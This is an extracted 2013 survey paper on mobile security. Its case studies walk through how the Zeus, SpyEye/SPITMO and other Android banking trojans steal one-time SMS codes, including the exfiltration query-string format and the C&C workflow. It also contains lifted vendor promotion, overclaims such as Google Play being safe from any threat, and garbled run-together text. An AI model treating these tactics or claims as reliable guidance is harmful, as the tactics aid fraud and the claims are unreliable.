Security issues vs user awareness in mobile devices a survey


Published on

Published in: Technology, Business
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Security issues vs user awareness in mobile devices a survey

  1. 1. International Journal of Advanced Research in Engineering and Technology (IJARET), ISSN0976 – 6480(Print), ISSN 0976 – 6499(Online) Volume 4, Issue 3, April (2013), © IAEME217SECURITY ISSUES VS USER AWARENESS IN MOBILE DEVICES: ASURVEYKhaja Mizbahuddin Quadry,Research scholar,JNTUK, Kakinada, A.P, IndiaDr. Mohammed Misbahuddin,Senior Technical Officer,C-DAC, Electronic city, BangaloreDr.A.Govardhan,Professor of CSE Dept and Director of Evaluation,JNTU, Hyderabad, A.P., IndiaABSTRACTMobile devices help modern man stay connected. Mobile phones come handy to serve thispurpose; they use a radio link available in a geographical area, to make and receive telephonic calls,without compromising on the mobility. In the most recent years, the mobile phones are not just meantfor making calls; they are used for many more purposes. Their penetration rate has increaseddrastically with a wide range of applications coming into the market every day. The latest ones, theSmart phones, serve an increasing number of activities besides storing sensitive data. This has madethe mobile phones a prime target for attacks. The users lose all the important data besides losing ahandsome amount with the loss of mobile phones; even messaging has become highly insecure.Hence this paper intends to discuss the results of a survey made online on the possible attacks onmobile devices. The paper also throws light on the case studies of a variety of attacks that have beenregistered in the world of mobile phones.Keywords: Security issues, Vulnerabilities, attacks, malware1. INTRODUCTIONMobile phones, [1] otherwise called the cell phones, facilitate making and receivingtelephonic calls through a radio link available in a geographical area, while being mobile. The cellularnetwork provided by a mobile phone service provider in any area allows the cell phone access to thepublic telephone network. In addition to telephony, text messaging, mailing, internet access, shortINTERNATIONAL JOURNAL OF ADVANCED RESEARCH INENGINEERING AND TECHNOLOGY (IJARET)ISSN 0976 - 6480 (Print)ISSN 0976 - 6499 (Online)Volume 4, Issue 3, April 2013, pp. 217-225© IAEME: Impact Factor (2013): 5.8376 (Calculated by GISI)www.jifactor.comIJARET© I A E M E
  2. 2. International Journal of Advanced Research in Engineering and Technology (IJARET), ISSN0976 – 6480(Print), ISSN 0976 – 6499(Online) Volume 4, Issue 3, April (2013), © IAEME218range wireless communications (I.R, Bluetooth) business applications, gaming and photography arealso possible by these modern mobile phones.. Hence, every common man in the modern times finds atrustworthy companion in the form of these mobile phones. They serve as a means to stay connectedwith family and friends, carry on business transactions, make emergency calls, etc. Records show thatrural consumers, earning less than $1000 yearly, make the fastest growing cell phone subscribersworld-wide. The expansion of Indian cell phone industry presents a sharp contrast when compared tothe other industries. The present day Smart phones are supported with more general computingcapabilities. The cell phone industry registered a boost in December 2008. More than 10million newsubscribers were reported in comparison to the 8 million in 2007. The overall subscription in the cellphone industry grew by 48% in 2008 with 34 million customers. The past twenty years, from 1990 to2010, recorded a growth in the worldwide mobile phone subscriptions, from 12.4 million to over 4.6billion; it penetrated and reached the bottom level of the economic pyramid in the developingeconomies. An exponential increase in the numbers of users has been recorded ever since the mobilephones were first made available. The end of 2009 saw over 50 mobile operators with 10 millionsubscribers each and another over 150 mobile operators with at least one million subscribers. The year2010, has recorded 4.6billion mobile phone subscribers on the whole, a number that is expected togrow more rapidly in the years to come...2.1 VULNERABILITIES and Security of Mobile DevicesWith the wide spread use of Mobile phones for a wide range of applications, their security is amatter of serious concern. Mobile phones are nowadays considered to be the very handyauthentication medium by many websites [3] and by most of the online businesses. They send an SMSbased authentication code for ensuring authentication online; often in clear text involving no codes.As these mobile phones run the risk of being stolen, the fraudster can easily read the text or forward itto another number. This allows a cyber criminal authenticate fraudulently. Vulnerability, [2] thoughnot so common a factor with the desktops, is very serious in case of mobile devices given to theirsmall size and portability; thus being easily stolen or lost. The report presented at Georgia Tech CyberSecurity Summit 2011, the Emerging Cyber Threats 2011 talks about the rise of vulnerabilities in caseof mobile browsers. The security experts say that the device constraints and tension between usabilityand security make it difficult to debug issues. As the mobile browsers never get updated as traditionalweb browsers do, and the users continue using the same operating system and the mobile browser as itwas on the date of manufacture, the attackers gain a big advantage. Attackers leverage a logic flaw inthe mobile network standards and force mobile phones to send premium rate SMS messagespreventing them from receiving messages for long periods of time. Major actions like checking creditor voice mail, calling emergency numbers or customer support and even performing mobile bankingare performed by these malicious applications, while typically they figure themselves as menu orapplication bearing the operators’ name. A majority of cell phones don’t notify for the SIM Toolkitmessages; some others wakeup from their sleep mode, but neither they indicate the receipt of anyneither message nor do they show any message in the inbox. However, when automated error reportsare sent, the users of some branded phones get notified for the message being sent but can’t really seeany message. Only the Nokia devices ask for confirmation to send SIM toolkit response. But thisoption, asking for confirming the SIM service actions, is off by default on the phones configured bythe operators. The most recent devices like iphones and the Windows mobile 6.x devices notify themessage being sent but offer no way to stop it. However the sender can request for a reply via SMSeither directly to the sender’s number or to the operator’s message center. The online bankingapplications through mobile browsers are also vulnerable to the phishing websites that invite the bankcustomers to enter their passwords or other credentials.
  3. 3. International Journal of Advanced Research in Engineering and Technology (IJARET), ISSN0976 – 6480(Print), ISSN 0976 – 6499(Online) Volume 4, Issue 3, April (2013), © IAEME2193 CASE STUDIESWe discuss some of the mobile phone attacks reported.3.1 CASE STUDY: ZEUS TROJAN ATTACKS BANKS 2-FACTOR AUTHENTICATIONZeus [4], a type of banking Trojan, has been reported to target the mobile phones when theusers try to get their handsets upgraded to the two-factor authentication facility. The F-secureantivirus provider researchers informed that the Zeus MitMo attack appears to be similar to thereported in Spain. In both the cases the malware attempted to steal the mTANs (mobile transactionauthentication numbers) used by a majority of European banks an enhanced authentication service totheir online customers. In this case the financial institutions provide a one-time password throughSMS, which in the secondary stage needs pass codes to login to online accounts. The Zeus Mitmo[5]creates a fraudulent field on the web page prompting the users to provide their cell phone numbersand the type of handset they use. As there is no change in the URL or any changes in the header orfooter that hints about the untrusted security panel. The users provide the information thinking thatthey are enhancing their security, least knowing that the notification is fraudulent. Thus activated, theapp then monitors your SMS messages and sends the mTANS to the Zeus operator, making it possibleto gain access to your bank account as it has got your user name, password and mTAN; combinationthat would clear your account of cash.3.2 Case study: Spy Eye banking Trojan: now with SMS hijacking capabilityAnother banking Trojan, the Spy Eye[7] has the capability to reroute the SMSes carrying the one-time passwords sent to victims cell phones. This feature enables the Trojan to bypass all theprotections adopted by the financial institutions. In yet another case, the Spy Eye tried to redirect andtrick the victims to reassigning the cell phone number that they have registered with the banks toreceive one-time passwords. The fraudulent pages injected into the online banking sessions make afalse claim that the users have been assigned a unique telephone number and that they would receive aspecial SIM card in the mail shortly. Thus injected, Spy Eye allows the fraudsters to receive all theSMS transaction verification codes for the hijacked account via their own telephone network. In thisway they divert funds using the SMS confirmation system from the customers account withoutacknowledgement or triggering any fraud detection alarms.How the attack works: The malware first gains the access to the login information logs into theaccount without being detected by the bank or the consumer. With the help of social engineering heobtains the confirmation code originally used to activate the consumers mobile phone number withthe bank. To do this the malware injects a page that is assumed by the consumer that it is from thebank. It says that as a requirement for the new security system unique telephone numbers are beingissued to the customers and that they will receive a special SIM card in the mail. The customers areprompted to reregister with the bank using the original confirmation code into the relevant field; ofcourse, the Black Hats are ready to capture it. On getting the code the fraudsters claim for a change inthe old phone number with the new one which will be their own number. As soon as this is done, theydivert the funds, without alerting the customer or the bank about the fraud. These unauthorizedwithdrawals or expenditures are noticed only when the customer logs in to his account. This is enoughto demonstrate that all out-of-band authentication systems, including SMS-based solutions, are notfool-proof. As the banks have started verifying the transactions and subjecting them to various frauddetection systems, the fraudsters are using a combination of MITB (man in the browser injection)technology and social engineering to buy themselves more time. Once a computer has been identifiedto be infected with Spy Eye, such attacks can be checked with endpoint security that blocks MITBtechniques. Only a layered approach to security can solve the issue otherwise even the mostsophisticated OOBA schemes would fail.
  4. 4. International Journal of Advanced Research in Engineering and Technology (IJARET), ISSN0976 – 6480(Print), ISSN 0976 – 6499(Online) Volume 4, Issue 3, April (2013), © IAEME2203.21 First Spy Eye Attack on Android Mobile PlatformSpy Eye [8] is fast spreading in the mobile market, making the Android mobile platform theirtarget. Ever since Man in the Mobile attacks (MitMo/ZitMo) first emerged in late 2010, Spy Eyeintroduced their own hybrid desktop-mobile attacks (dubbed SPITMO). On the Zeus’ tracks.Trojan: SymbOS/SpitmoThe SPITMO Trojan injects fraudulent fields for the user’s mobile phone number and the IMEI of thephone into the banks webpage, thus directing the user to provide them. The Trojan needs to link up with thedeveloper certificate in order to get installed on the user’s phone. But as the developer’s certificate is tied to theIMEI of the user’s mobile phone, the malware authors request the IMEI along with the phone number on thebanks website. On receiving the new IMEIs, they request an updated certificate with the IMEIs of all thevictims in order to sign in and create a new installer. The delay in getting the new certificate from the developerexplains why the Spy Eye injected message states it can take up to three days for the certificate to be delivered.The cumbersome cycle which is used to circumvent Symbians signing in requirement makes theTrojan take up to three days to complete an attack.• Ask the user for their devices IMEI• Generate an appropriate certificate• Release an updated installerTrojan:DriodOS/SpitmoThe fraudsters find it unreasonable to wait for three days just to steal a couple of SMSs. The AndroidOS provides a much more intuitive and modern approach to succeed getting desired treasure. Figure3has a pictorial overview of how MitMo evolved. The figure shows clearly that before 2011Blackberry and symbian were affected by Zeus Trojan, but after April 2011 the Spy Eye Android,Blackberry and Symbian.Figure.3 MITMO EVOLUTI( Trustee reached the following analysis from a Spy Eye compromised machine on July 24th:Stage 1: MITB – web injects module (you know the drill...)When a compromised mobile is used for transacting with the targeted bank, a messageprompts a "new" security measure, supposedly being enforced by the bank, which is mandatory inorder to use its online banking service thereafter. It seems to be an Android application, fully safe andprotecting the phone’s SMS messages from being intercepted (there’s irony for you…) and guards theuser against any fraud.
  5. 5. International Journal of Advanced Research in Engineering and Technology (IJARET), ISSN0976 – 6480(Print), ISSN 0976 – 6499(Online) Volume 4, Issue 3, April (2013), © IAEME221The "set the application" button on clicking, provides further instructions for installing theapplication:Stage 2: Android (malicious) App installationThe user is directed to click on the URL: hxxp:// the installation of the Android application on the compromised device, the application named"System" is not visible. Its not a service, and it’s not listed in any of the current running applications.In order locate the existence of this app, a bit of searching is required:In order to complete the installation, the user is made to dial the number "325000"; the Androidmalware hijacks this call presenting a malicious activation code that is to be submitted later in to the"bank’s site":Following is the de-complied code snippet found responsible for the "activation code"operation but there is no reference to it in the application package (as of July 24)Stage 3: Android secure application is a TrojanAfter the successful installation, the Trojan intercepts all incoming SMSs and transfers themto the attacker C&C; the de-compiled code snippet given below creates a string for later use,whenever an SMS is received:“? Sender= [SendeerAddress] &receiver=[ReciverAddress]&text=[MessageBodyThe above formed string structure will be later be appended, as a query string, with a GET HTTPrequest, to be sent to the attackers end.There is a "Settings.xml" file (asset directory) with a configuration, within the app, for the Trojan;"Settings.xml" defines:• The transfer method i.e. SMS or HTTP• The attackers drop zone URLsHere’s a snippet of the extracts from "Settings.xml":Stage 4: SMS Spy Command & ControlFour domain names in the URLs in use were found not registered (yet!):;; and, Spy Eye - the domain ‘’ has been found‘hopping’ around in different IPs, in several locations, around the world.The snippet from SpyEye’stracker history record for the domain over a three day period shows as follows:Peepingaround the attacker C&C reveals an unprotected (at the moment!) statistics pageIt’s worth mentioning that the Attacker C&C above was produced the above stated information whenthe Trojan was tested in action in the lab. The Sender 15555215556 and the Recipient 15555215554refers to the two Android emulators used in the lab to simulate the attack (the corresponding HTTPtraffic is presented above). As indicated in the page, the attack has yet to gain momentum, so considerthis a warning. Im pretty sure this is just the beginning so I’m tempted to say, “To be continued…”SPITMO for Android loses the battle against TrusteerIt is hightime that the Organizations acted and installed a desktop browser security solution inthe multi layered security profile they have been using. The banks that already offer Trusteer Rapportare automatically protected and are NOT vulnerable to this attack - even if the Trojan is downloaded.This is due to Rapport being supported by a feature to prevent Spy Eye from installing on thecustomers PC, thus terminating the attack before it takes hold. Those who are not using Rapport,Trusteer Pinpoint will detect and report the real-time victims, as being infected with this variant ofSpyEye, when they attempt to log in to the banks website. The attack is nullified by restricting theservices to these reportedly infected machines, like disabling it to complete transactions. Finally,Trusteer Mobile for Android (either Secure Library or Secure Browser) will detect and block suchattacks by preventing any malicious activity.
  6. 6. International Journal of Advanced Research in Engineering and Technology (IJARET), ISSN0976 – 6480(Print), ISSN 0976 – 6499(Online) Volume 4, Issue 3, April (2013), © IAEME2223.22 SPY EYE BANK TROJAN HIDES ITS FRAUD FOOTPRINTAnother nastier version of Spy Eye [9], has been detected with the ability to hide allfraudulent transactions from victims and was found allegedly targeting the major UK banks. This SpyEye version is a tweak of the Zeus crimeware kit that grabs web-form data within browsers. This newTrojan, doesn’t intercept or divert email messages, rather hides the fraudulent transactions, masks theamount of the transaction, and puts forward a fake balance, ensuring that victims are unaware ofanything being amiss on their account. Its work can be briefed as:1. Spy Eye steals the debit card data by employing a man-in-the-browser attack on an onlinebanking session.2. The fraud is committed with the debit card data.3. Thirdly, the Spy Eye initiates a post-transaction attack and hides the fraudulent transactionsfrom the victim, when he logs in to his account the next timeHere’s detailed description of how it goes down:Step 1 – Malware Post-Login Attack - Credentials Stolen:a. The victim’s machine is first infected with any Man in the Browser malware (e.g. Zeus, Spy Eye,Carberp), with a suitable configuration.b. The fraudulently configured malware asks the customer for debit card data during the login phase(HTML injection) – e.g. card number, CVV2, month and year of expiry, etc.Step 2 – Fraudster Commits Fraudulent Activity:c., The cybercriminals then create a card-not-present transaction fraud by making a purchase ortransferring money over the telephone or the internet using the customer’s debit card details.d. The fraudulent transaction details are immediately fed in to the malware control panel by thefraudster.Step 3 – Malware Post-Transaction Attack with Fraud Hidden from View:Figure 4 MitMo Attack Cycle (
  7. 7. International Journal of Advanced Research in Engineering and Technology (IJARET), ISSN0976 – 6480(Print), ISSN 0976 – 6499(Online) Volume 4, Issue 3, April (2013), © IAEME2233.32 Case Study: Android Trojan records callsCyber Criminals [11] have increased the functionality of Android Trojans. Earlier versions ofmobile malware strains for Googles mobile platform were able to log the duration and numbers ofincoming and outgoing calls. The new malware goes a step ahead by capturing the whole content ofconversations before storing them on the SD-slot memory card of infected Android phones. Thehackers then upload these conversations to a server, according to the tests carried on the malware bythe security researchers at CA in a closed environment On installation, the malware drops aconfiguration file containing the key information about the remote server and the parameters.’ Thisas-yet-unnamed malware cannot install by itself. It needs to be installed by the victims who consider itto be a prototype of some sort, a game or a tool that they can use against their spouses to keep trackof their activities. The Victims, tricked into installing it, would need to agree to install the application,grant it permissions to record audio, read the state of a phone and prevent it from sleeping.3.31 NEW Drive-By Android Trojan Attacks Mobile UsersAndroid.Notcompatible [11], an Android Trojan horse program getting installed via a partialdrive-by download has been identified as a threat by Symantec. Though Symantec givesAndroid.Notcompatible its lowest risk level, very Low, the main concern is that it might be copied byother hackers to use the technique in other attacks. Drive-by downloads—the malware that installsitself without the users knowledge--typically occur when a website is visited. Android.Notcompatiblepretends as a genuine system update under the name "com.Security.Update". The images below showthe download and installation. Taking the program to be a genuine update by its pretence, the infectedusers approve installation. After being installed on a phone, Android.Notcompatible monitors allincoming and outgoing data including the personal one, sends its copies to the attacker through aproxy code. Android.Notcompatible spreads via URL redirects injected into the HTML of innocentbystander sites. The users who allow installation from unknown sources are most susceptible. Userswho download apps from Google Play are safe from this or any other threat. The following sites havebeen identified as Android.Notcompatible hosts, by Symantec. (The "http" part of the addresses isbracketed to prevent accidental launches of infected sites.):• [http://]• [http://]• [http://]• [http://]androidonlinefix.info3.4 Case Study: Scumbags get sneaky with new self-robbery TrojanA particularly sneaky banking Trojan equipped with a self-robbery tricks that traps victimsinto transferring funds into the accounts controlled by cyber crooks or their partners has beendeveloped by the malware-peddlers[12]. The users of the infected machines, on logging in to the banksite, get a fake message alerting them of a mistaken credit to their account, asking the user to revertthe said amount to unfreeze their account. Trojan falsely inflates displayed account balances oninfected machines, besides offering a pre-filled online transfer form in order to make the ploy moreplausible. All these make the victim trust and transfer the said amount without getting it confirmedfrom the bank. While previous banking Trojans, like the URL Zone Trojan displayed fake balances oninfected machines, this latest strain of malware is an evolution of this line of attack. As the period oftime involved in banking fraud increases the risk of the fraud being tracked down, the fraudsters findit safer tricking victims into transferring funds themselves rather than employing money mules toforce entry to the compromised accounts. Fraudsters can thus quickly loot accounts, before thecompromised accounts are suspended or login credentials changed.
  8. 8. International Journal of Advanced Research in Engineering and Technology (IJARET), ISSN0976 – 6480(Print), ISSN 0976 – 6499(Online) Volume 4, Issue 3, April (2013), © IAEME2244 CONCLUSIONSThis survey concludes that Mobile phones are not secure unless the user is well aware of therisks. They can be attacked and used for various fraudulent purposes, not normally identified by users.This paper explores some vulnerabilities, and explains how they may be exploited. Finally, the casestudies expose consequences of attacks on mobile phones by malware. The lack of security awareness[15] among cell phone users and their carelessness are the two prominent risk factors that fall theusers prey to the fraudsters. It is extremely important to understand that a smart phone is far more thanjust a phone and cannot be treated like one of ordinary standards. Unlike the previous generations ofcell phones, that were least susceptible to Bluetooth hijacking, the modern smart phones are prone tothe same risks as PCs, equipped with Bluetooth or internet features. New attack vectors willincreasingly be exploited by fraudsters as online banking services use these devices as secondauthentication factors given the convergence between PCs and cell phones.Recommendations for a secure mobile banking:• Check rating, user reviews, and comments for each mobile application you download.Avoid low rated, new applications, and bad reviews.• Carefully evaluate the permission requested by Android applications when you install them.Applications that ask for access to text messages and other sensitive information shouldraise a red flag and further researched before you download it• Have your PC protected with online banking security software such as Trusteer Rapport thatcan be downloaded from your banks website. This software rules out the possibility ofMitMo attacks by restricting fraudsters from controlling the web channel.• Regularly install updates on your mobile device• Enable access protection measures such as a PIN or password (if possible). Configure thesmart phone to automatically lock after a minute or so when being idle.• Before installing or using new smartphone apps or services, check their reputation. Onlyinstall applications from trusted sources.• Pay attention to the security permissions requested by every application and service youinstall.• Keep your operating system and software applications up to date.• Disable features not in use: Bluetooth, infrared or Wi-Fi.• If you have Bluetooth enabled, set your device to be hidden and password-protect it.• Make regular backup copies of your important files.• Encrypt sensitive information whenever possible.• Use call and SMS encryption software.• Whenever possible, do not store sensitive information on the smartphone. Make sure it isnot cached locally.• Erase all information from the smartphone once you get rid of it.• In the event your phone is lost or stolen, inform your service provider and give them yourdevice‘s IMEI number to block it.• You can also use remote or automatic deletion of data (after several failed login attempts).• Monitor the smartphone for anomaly detection.• Check your account activity frequently to detect fraud.• Be aware of the risks associated with these devices and use them correctly
  9. 9. International Journal of Advanced Research in Engineering and Technology (IJARET), ISSN0976 – 6480(Print), ISSN 0976 – 6499(Online) Volume 4, Issue 3, April (2013), © IAEME225REFERENCES[1][2][3][4][5][6] - United States[7][8][9][10][11][12]][13][14][15][16] K.Sangeetha and Dr.K.Ravikumar, “A Framework for Practical Vulnerabilities of the Tor (TheOnion Routing) Anonymity Network”, International Journal of Computer Engineering & Technology(IJCET), Volume 3, Issue 3, 2012, pp. 112 - 120, ISSN Print: 0976 – 6367, ISSN Online: 0976 – 6375[16] A.Edwinrobert and Dr.M.Hemalatha, “Behavioral and Performance Analysis Model for MalwareDetection Techniques”, International Journal of Computer Engineering & Technology (IJCET),Volume 4, Issue 1, 2013, pp. 141 - 151, ISSN Print: 0976 – 6367, ISSN Online: 0976 – 6375